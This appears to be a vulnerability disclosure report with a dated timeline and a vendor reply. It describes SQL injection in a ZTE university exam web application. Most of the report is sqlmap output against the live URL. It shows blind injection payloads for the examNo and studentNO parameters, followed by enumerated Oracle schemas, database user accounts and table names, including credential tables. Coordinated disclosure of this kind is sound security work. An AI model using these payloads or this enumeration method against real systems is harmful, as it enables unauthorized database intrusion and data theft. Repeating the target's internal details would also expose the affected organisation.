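2014-03-01: Details reported to the vendor; awaiting vendor handling
2014-03-03: Vendor confirmed; details disclosed to the vendor only
2014-03-13: Details disclosed to core white hats and experts in related fields
2014-03-23: Details disclosed to regular white hats
2014-04-02: Details disclosed to trainee white hats
2014-04-15: Details disclosed to the public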
URL: http://univ1.zte.com.cn/XsExam/Application/ForePlatform/Exam_ErrorQestion_Analyse.aspx?examNo=55239&studentNO=20070910056177

Boolean-based blind injection

[*] starting at 17:58:26

[17:58:26] [INFO] resuming back-end DBMS 'oracle'
[17:58:26] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: examNo
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: examNo=55239' AND 3796=3796 AND 'IqXn'='IqXn&studentNO=20070910056177

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: examNo=55239' AND 5439=DBMS_PIPE.RECEIVE_MESSAGE(CHR(84)||CHR(75)||CHR(97)||CHR(79),5) AND 'SRkp'='SRkp&studentNO=20070910056177

Place: GET
Parameter: studentNO
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: examNo=55239&studentNO=20070910056177' AND 4317=4317 AND 'fBuR'='fBuR

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: examNo=55239&studentNO=20070910056177' AND 1817=DBMS_PIPE.RECEIVE_MESSAGE(CHR(75)||CHR(99)||CHR(104)||CHR(76),5) AND 'alET'='alET
---
there were multiple injection points, please select the one to use for following injections:
[0] place: GET, parameter: studentNO, type: Single quoted string (default)
[1] place: GET, parameter: examNo, type: Single quoted string
[q] Quit
>
[17:58:36] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Oracle
[17:58:36] [INFO] fetching current database
[17:58:36] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[17:58:36] [INFO] retrieved:
[17:58:37] [WARNING] reflective value(s) found and filtering out
XSEXAM
current schema (equivalent to database on Oracle): 'XSEXAM'
[17:59:08] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[17:59:08] [INFO] fetching database (schema) names
[17:59:08] [INFO] fetching number of databases
[17:59:08] [INFO] resumed: 30
[17:59:08] [INFO] resumed: ADAPTEXAM
[17:59:08] [INFO] resumed: AMP
[17:59:08] [INFO] resumed: CTXSYS
[17:59:08] [INFO] resumed: DBSNMP
[17:59:08] [INFO] resumed: DMSYS
[17:59:08] [INFO] resumed: DSC
[17:59:08] [INFO] resumed: DSCMD
[17:59:08] [INFO] resumed: EASK
[17:59:08] [INFO] resumed: ELEARNING
[17:59:08] [INFO] resumed: EMPTRAIN
[17:59:08] [INFO] resumed: EMPTRAIN2004
[17:59:08] [INFO] resumed: ETS
[17:59:08] [INFO] resumed: ETS_INTERFACE
[17:59:08] [INFO] resumed: EUNIV
[17:59:08] [INFO] resumed: EVALCENTER
[17:59:08] [INFO] resumed: EXFSYS
[17:59:08] [INFO] resumed: LHC
[17:59:08] [INFO] resumed: MAIL_SERVICE
[17:59:08] [INFO] resumed: MDSYS
[17:59:08] [INFO] resumed: OLAPSYS
[17:59:08] [INFO] resumed: ORDSYS
[17:59:08] [INFO] resumed: OUTLN
[17:59:08] [INFO] resumed: SYS
[17:59:08] [INFO] resumed: SYSMAN
[17:59:08] [INFO] resumed: SYSTEM
[17:59:08] [INFO] resumed: TSMSYS
[17:59:08] [INFO] resumed: WMSYS
[17:59:08] [INFO] resumed: XDB
[17:59:08] [INFO] resumed: XSEXAM
[17:59:08] [INFO] resumed: ZTETRAIN
available databases [30]:
[*] ADAPTEXAM
[*] AMP
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] DSC
[*] DSCMD
[*] EASK
[*] ELEARNING
[*] EMPTRAIN
[*] EMPTRAIN2004
[*] ETS
[*] ETS_INTERFACE
[*] EUNIV
[*] EVALCENTER
[*] EXFSYS
[*] LHC
[*] MAIL_SERVICE
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[*] XSEXAM
[*] ZTETRAIN

Users:
database management system users [49]:
[*] ADAPTEXAM
[*] AMP
[*] ANONYMOUS
[*] BACKUPUSER
[*] CTXSYS
[*] DBSNMP
[*] DIP
[*] DMSYS
[*] DSC
[*] DSCMD
[*] EASK
[*] ELEARNING
[*] EMPTRAIN
[*] EMPTRAIN2004
[*] ETS
[*] ETS_INTERFACE
[*] EUNIV
[*] EVALCENTER
[*] EXFSYS
[*] HR_SLT
[*] LHC
[*] MAIL_SERVICE
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] NC_READER
[*] OLAPSYS
[*] ORACLE_OCM
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] SI_INFORMTN_SCHEMA
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TIVOLI
[*] TO_DSS
[*] TO_ESEARCH
[*] TO_ETS
[*] TO_FOL
[*] TO_HR
[*] TPG
[*] TSMSYS
[*] UNIVARCHIVE
[*] UNIVDB_DMOLVIEW
[*] WMSYS
[*] XDB
[*] XSEXAM
[*] ZTETRAIN

Tables:
Database: DMSYS
[2 tables]
+-------------------+
| DM$P_MODEL        |
| DM$P_MODEL_TABLES |
+-------------------+

It's rather slow, so I only ran it up to here..

[18:08:06] [INFO] fetching tables for database: 'XSEXAM'
[18:08:06] [INFO] fetching number of tables for database 'XSEXAM'
[18:08:06] [WARNING] running in a single-thread mode. Please consider usage option '--threads' for faster data retrieval
[18:08:06] [INFO] retrieved:
[18:08:08] [WARNING] reflective value(s) found and filtering out
142
[18:08:28] [INFO] retrieved: TMP_ANSWER_LOG_TMP
[18:12:30] [INFO] retrieved: ATMP_ID
[18:14:10] [INFO] retrieved: ATMP_ID_UPDID
[18:15:54] [INFO] retrieved: BACKUP_1
[18:17:42] [INFO] retrieved: CHECK_EMPLOYEEBASE_INFO
[18:22:34] [INFO] retrieved: EXAM_ANSWER_57721
[18:26:21] [INFO] retrieved: EXAM_ANSWER_TEMP_UPDID
[18:29:05] [INFO] retrieved: EXAM_AUTOJUDGE_QUEUE
[18:32:20] [INFO] retrieved: EXAM_BASE_DEFINE
[18:34:57] [INFO] retrieved: EXAM_COPY_SUCCEED
[18:37:48] [INFO] retrieved: EXAM_COPY_SUCCEED_UPDID
[18:39:52] [INFO] retrieved: EXAM_DIC_DIFFICULT
[18:42:51] [INFO] retrieved: EXAM_EXAMINATION_EX
[18:46:10] [INFO] retrieved: EXAM_FILE_QUEUE
[18:48:33] [INFO] retrieved: EXAM_FILE_QUEUE_HISTORY
[18:50:57] [INFO] retrieved: EXAM_GROUP_INFO
[18:53:27] [INFO] retrieved: EXAM_GROUP_INFO_UPDID
[18:55:31] [INFO] retrieved: EXAM_GROUP_USER
[18:56:56] [INFO] retrieved: EXAM_GROUP_USER_UPDID
[18:58:55] [INFO] retrieved: EXAM_JUDGING_CONFIG
[19:02:11] [INFO] retrieved: EXAM_JUDGING_CONFIG_UPDID
[19:04:20] [INFO] retrieved: EXAM_LEVEL_TEMPLATE_UPDID
[19:08:58] [INFO] retrieved: EXAM_MEMBERLIST
[19:11:21] [INFO] retrieved: EXAM_OBJECT_EXAM
[19:13:58] [INFO] retrieved: EXAM_OBJECT_EXAM_TEST
[19:15:53] [INFO] retrieved: TMP_ANSWER_LOG_71913
[19:20:18] [INFO] retrieved: EXAM_TQ_EES_BL_UPDID
[19:24:42] [INFO] retrieved: EXAM_TQ_EES_CA
[19:25:43] [INFO] retrieved: EXAM_TQ_EES_CA_UPDID
[19:27:39] [INFO] retrieved: EXAM_TQ_EES_GR
[19:28:42] [INFO] retrieved: EXAM_TQ_EES_GR_SELITEMS
[19:31:15] [INFO] retrieved: EXAM_TQ_EES_GR_UPDID
[19:33:01] [INFO] retrieved: EXAM_TQ_EES_JU
[19:34:04] [INFO] retrieved: EXAM_TQ_EES_JU_UPDID
[19:36:09] [INFO] retrieved: EXAM_TQ_EES_LI
[19:37:12] [INFO] retrieved: EXAM_TQ_EES_LI_SELITEMS
[19:39:46] [INFO] retrieved: EXAM_TQ_EES_LI_UPDID
[19:41:32] [INFO] retrieved: EXAM_TQ_EES_MS
[19:42:35] [INFO] retrieved: TMP_ANSWER_20090617_2
[19:47:22] [INFO] retrieved: TMP_ANSWER_20090617_2_UPDID
[19:49:36] [INFO] retrieved: TMP_ANSWER_20090617_UPDID

[18:41:29] [INFO] fetching tables for database: 'SYSMAN'
[18:41:29] [INFO] fetching number of tables for database 'SYSMAN'
[18:41:29] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[18:41:29] [INFO] retrieved:
[18:41:30] [WARNING] reflective value(s) found and filtering out
341
[18:41:52] [INFO] retrieved: MGMT_CREDENTIAL_SETS
[18:46:23] [INFO] retrieved: MGMT_CREDENTIAL_SET_COLUMNS
[18:49:05] [INFO] retrieved: MGMT_CREDENTIALS2
[18:50:18] [INFO] retrieved: MGMT_NOTIFY_QTABLE
[18:53:28] [INFO] retrieved: AQ$_MGMT_NOTIFY_QTABLE_S
[18:58:57] [INFO] retrieved: SYS_IOT_OVER_50179
[19:03:07] [INFO] retrieved: MGMT_VERSIONS
[19:06:12] [INFO] retrieved: MGMT_TABLE_SIZES
[19:08:56] [INFO] retrieved: MGMT_INDEX_SIZES
[19:11:42] [INFO] retrieved: MGMT_REBUILD_INDEXES
[19:15:21] [INFO] retrieved: MGMT_LICENSES
[19:17:25] [INFO] retrieved: MGMT_AVAILABILITY
[19:20:17] [INFO] retrieved: MGMT_CURRENT_AVAILABILITY
[19:24:59] [INFO] retrieved: MGMT_AVAILABILITY_MARKER
[19:29:21] [INFO] retrieved: MGMT_MASTER_AGENT
[19:32:18] [INFO] retrieved: MGMT_MASTER_CHANGED_CALLBACK
[19:36:22] [INFO] retrieved: MGMT_TARGET_BASELINES
[19:40:09] [INFO] retrieved: MGMT_TARGET_BASELINES_DATA
[19:42:11] [INFO] retrieved: MGMT_METRICS
[19:44:03] [INFO] retrieved: MGMT_METRICS_EXT
[19:45:40] [INFO] retrieved: MGMT_TARGET_TYPES
[19:48:41] [INFO] retrieved: MGMT_TARGETS
[19:49:31] [INFO] retrieved: MGMT_TYPE_PROPER
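Severity: High
Vulnerability Rank: 10
Confirmed: 2014-03-03 09:18
Thanks, U神. The related vulnerabilities will be fixed as soon as possible. Thank you.
None at this time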